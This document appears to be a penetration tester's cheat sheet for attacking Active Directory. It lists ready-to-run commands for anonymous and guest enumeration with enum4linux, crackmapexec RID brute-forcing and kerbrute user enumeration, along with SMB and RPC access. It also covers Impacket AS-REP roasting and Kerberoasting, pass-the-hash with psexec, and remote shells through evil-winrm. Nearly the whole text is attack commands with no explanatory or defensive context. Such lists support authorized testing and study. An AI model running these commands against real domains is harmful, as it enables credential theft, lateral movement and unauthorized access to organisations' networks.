Active Directory
Enum
enum4linux
enum4linux -a -u "" -p "" $targetdomain && enum4linux -a -u "guest" -p "" $targetdomain
crackmapexec
crackmapexec smb $targetdomain -u 'anonymous' -p '' --rid-brute
kerbrute
./kerbrute_linux_amd64 userenum -d $targetdomain --dc $targetdc /usr/share/wordlists/xato-net-10-million-usernames.txt
rpcclient
rpcclient -U guest $targetdomain
smbclient
smbclient \\\\$targetdomain\\C$ -U guest
impacket
python GetNPUsers.py $targetdomain/ -usersfile users.txt -dc-ip $targetdomain
python GetUserSPNs.py -request -dc-ip $targetdomain $targetdomain/guest -no-pass
python mssqlclient.py -p 1433 -windows-auth -dc-ip $targetdomain "$targetdomain/$targetusername:$targetpassword"@$targetdomain
python psexec.py -hashes hhhhhhhhh:hhhhhhhhh $targetadmin@$targetdomain
Exploit
evil winrm
- evil-winrm
gem install evil-winrm
evil-winrm -i $targetdomain -u $targetuser@$targetdomain -p $targetpassword